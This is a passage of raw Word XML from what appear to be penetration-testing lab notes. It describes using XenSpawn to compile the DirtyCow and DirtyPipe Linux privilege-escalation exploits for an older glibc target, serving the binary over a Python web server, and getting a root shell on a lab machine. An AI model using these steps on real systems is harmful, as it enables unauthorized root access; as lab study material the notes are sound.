        <w:t xml:space="preserve">cd XenSpawn/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="982"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x </w:t>
      </w:r>
      <w:hyperlink r:id="rId1147">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">spawn.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd XenSpawn/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="982"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ./spawn.sh &lt;MACHINE_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="982"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace it your own name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="982"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemd-nspawn -M &lt;MACHINE_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="982"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, you can run your gcc commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="982"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -pthread 40839.c -o dirty -lcrypt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035E9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035EA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>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35EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035EE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4wa6axc044q9" w:id="482"/>
      <w:bookmarkEnd w:id="482"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Xenspawn walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I tested xenpawn on XXXXXXXXX-B .149 using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1148">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2022-0847-DirtyPipe-Exploits</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Before, I had to add the -static to fix it, and even when I did that, it couldn't open the shell but it did reset the password of root user. But, when I tried with xenspawn, it did the exploit fully, including opening a root shell. So xenspawn definitely does a lot better than just slapping on static flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, you need to open a root shell in Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd XenSpawn/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ./spawn.sh xenial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a container called xenial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemd-nspawn -M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a session in xenial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, I am working in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/lib/machines/xenial</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but I want to go to root directory in the xenial container, so inside the session I just go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/machines/xenial/root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, you can't download files while inside of the container, so go to your kali terminal, go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/machines/xenial/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and download the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, inside of the xenial session, you can run gcc without static</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc exploit-1.c -o exploit-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then, you can exit session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003600">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In your kali, while still inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/machines/xenial/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, start python listener and upload to target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003601">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003602">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003603">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003604">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yw0v0dqkxusx" w:id="483"/>
      <w:bookmarkEnd w:id="483"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-static vs. dynamically linked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003605">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is best explained with an example. In the XXXXXXXXX-B .149, we had a machine vulnerable to DirtyPipe exploit. So, I downloaded the exploit and ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc exploit-1.c -o exploit-1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on my Kali, and then uploaded it to victim, but then when I ran it on victim I got this error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./exploit-1: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit-1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003607">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003608">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells us that when it looked in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib/x86_64-linux-gnu/libc.so.6 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for the dependencies, it had problems since </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GLIBC_2.33 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was the version of my GLIBC on my Kali (where I compiled the binary) but the GLIBC version of target was only </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GLIBC_2.31</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. So, this causes issues with dependencies. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003609">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
